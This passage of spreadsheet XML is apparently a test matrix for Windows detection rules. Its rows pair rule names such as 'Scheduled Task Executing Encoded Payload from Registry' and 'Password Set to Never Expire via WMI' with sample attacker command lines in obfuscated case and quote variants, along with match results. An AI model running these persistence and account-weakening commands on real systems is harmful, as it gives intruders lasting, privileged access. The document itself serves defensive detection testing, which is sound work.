        </is>
      </c>
      <c r="C242" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D242" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E242" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" /"tn" "MyScheduledTask.xml" /xml C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F242" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G242" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H242" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I242" s="43" t="n"/>
      <c r="J242" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K242" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="243" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A243" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B243" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C243" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D243" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E243" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" /tn "MyScheduledTask.xml" /XML C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F243" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G243" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H243" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I243" s="43" t="n"/>
      <c r="J243" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K243" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="244" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A244" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B244" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C244" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D244" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E244" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"create" /tn "SuspiciousTask" /xml "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F244" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G244" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H244" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I244" s="43" t="n"/>
      <c r="J244" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K244" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="245" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A245" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B245" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C245" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D245" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E245" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" -"tn" "SuspiciousTask" -"xml" "C:\temp\masqueraded_payload.txt" -"f" /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F245" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G245" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H245" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I245" s="43" t="n"/>
      <c r="J245" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K245" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="246" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A246" s="36" t="inlineStr">
        <is>
          <t>t1036.005</t>
        </is>
      </c>
      <c r="B246" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C246" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D246" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E246" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"create" /"tn" "SuspiciousTask" /xml "C:\temp\masqueraded_payload.txt" /F /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F246" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G246" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H246" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I246" s="43" t="n"/>
      <c r="J246" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K246" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="247" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A247" s="43" t="n"/>
      <c r="B247" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C247" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D247" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E247" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F247" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G247" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H247" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I247" s="43" t="n"/>
      <c r="J247" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K247" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="248" ht="15.75" customHeight="1" s="42">
      <c r="A248" s="43" t="n"/>
      <c r="B248" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C248" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D248" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E248" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F248" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G248" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H248" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I248" s="43" t="n"/>
      <c r="J248" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K248" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="249" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A249" s="43" t="n"/>
      <c r="B249" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C249" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D249" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E249" s="36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F249" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G249" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H249" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I249" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J249" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K249" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="250" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A250" s="43" t="n"/>
      <c r="B250" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C250" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D250" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E250" s="36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F250" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G250" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H250" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I250" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J250" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K250" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="251" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A251" s="43" t="n"/>
      <c r="B251" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C251" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D251" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E251" s="36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F251" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G251" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H251" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I251" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J251" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K251" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="252" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A252" s="43" t="n"/>
      <c r="B252" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C252" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D252" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E252" s="36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F252" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G252" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H252" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I252" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J252" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K252" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="253" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A253" s="43" t="n"/>
      <c r="B253" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C253" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D253" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E253" s="36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F253" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G253" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H253" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I253" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J253" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K253" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="254" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A254" s="43" t="n"/>
      <c r="B254" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C254" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D254" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E254" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F254" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G254" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H254" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I254" s="43" t="n"/>
      <c r="J254" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K254" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="255" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A255" s="43" t="n"/>
      <c r="B255" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C255" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D255" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E255" s="36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F255" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G255" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H255" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I255" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J255" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K255" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="256" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A256" s="43" t="n"/>
      <c r="B256" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C256" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D256" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E256" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commAnd "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F256" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G256" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H256" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I256" s="43" t="n"/>
      <c r="J256" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K256" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="257" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A257" s="43" t="n"/>
      <c r="B257" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C257" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D257" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E257" s="36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F257" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G257" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H257" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I257" s="36" t="n"/>
      <c r="J257" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K257" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="258" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A258" s="43" t="n"/>
      <c r="B258" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C258" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D258" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E258" s="36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F258" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G258" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H258" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I258" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J258" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K258" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="259" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A259" s="43" t="n"/>
      <c r="B259" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C259" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D259" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E259" s="36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F259" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G259" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H259" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I259" s="36" t="n"/>
      <c r="J259" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K259" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="260" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A260" s="43" t="n"/>
      <c r="B260" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C260" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D260" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E260" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "BypassTask" /TR "powershell.exe -EncodedCommand aQBlAHgAZQB..." /SC ONLOGON /RL HIGHEST /F</t>
        </is>
      </c>
      <c r="F260" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G260" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H260" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I260" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J260" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K260" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="261" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A261" s="43" t="n"/>
      <c r="B261" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C261" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D261" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E261" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /tN "BypassTask" /"TR" "powershell.exe -"EncodedCommand" aQBlAHgAZQB..." /sc ONLOGON /"RL" HIGHEST /F</t>
        </is>
      </c>
      <c r="F261" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G261" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H261" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I261" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J261" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K261" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="262" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A262" s="43" t="n"/>
      <c r="B262" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C262" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D262" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E262" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /"TN" "BypassTask" /tR "powershell.exe -enc aQBlAHgAZQB..." /SC ONLOGON /Rl HIGHEST /f</t>
        </is>
      </c>
      <c r="F262" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G262" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H262" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I262" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a)</t>
        </is>
      </c>
      <c r="J262" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K262" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="263" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A263" s="43" t="n"/>
      <c r="B263" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C263" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D263" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E263" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /"TN" "BypassTask" /tR "powershell.exe -"EncodedCommand" aQBlAHgAZQB..." /"SC" ONLOGON /Rl HIGHEST /F</t>
        </is>
      </c>
      <c r="F263" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G263" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H263" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I263" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J263" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K263" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="264" ht="15.75" customHeight="1" s="42">
      <c r="A264" s="43" t="n"/>
      <c r="B264" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C264" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D264" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E264" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /"TN" "BypassTask" /TR "powershell.exe -enc aQBlAHgAZQB..." /SC ONLOGON /Rl HIGHEST /"F"</t>
        </is>
      </c>
      <c r="F264" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G264" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H264" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I264" s="36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264" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K264" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="265" ht="15.75" customHeight="1" s="42">
      <c r="A265" s="43" t="n"/>
      <c r="B265" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C265" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D265" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E265" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /tN "BypassTask" /tr "powershell.exe -eNcOdEDcoMmand aQBlAHgAZQB..." /SC ONLOGON /rl HIGHEST /F</t>
        </is>
      </c>
      <c r="F265" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G265" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H265" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I265" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J265" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K265" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="266" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A266" s="43" t="n"/>
      <c r="B266" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C266" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D266" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E266" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /tN "BypassTask" /"TR" "powershell.exe -enc aQBlAHgAZQB..." -"SC" ONLOGON /RL HIGHEST /F</t>
        </is>
      </c>
      <c r="F266" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G266" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H266" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I266" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a)</t>
        </is>
      </c>
      <c r="J266" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K266" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="267" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A267" s="43" t="n"/>
      <c r="B267" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C267" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D267" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E267" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CreATe /TN "BypassTask" /tr "powershell.exe -enc aQBlAHgAZQB..." /SC ONLOGON /RL HIGHEST /f</t>
        </is>
      </c>
      <c r="F267" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G267" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H267" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I267" s="36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267" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K267" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="268" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A268" s="43" t="n"/>
      <c r="B268" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C268" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D268" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E268" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnD "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F268" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G268" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H268" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I268" s="43" t="n"/>
      <c r="J268" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K268" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="269" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A269" s="43" t="n"/>
      <c r="B269" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C269" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D269" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E269" s="36" t="inlineStr">
        <is>
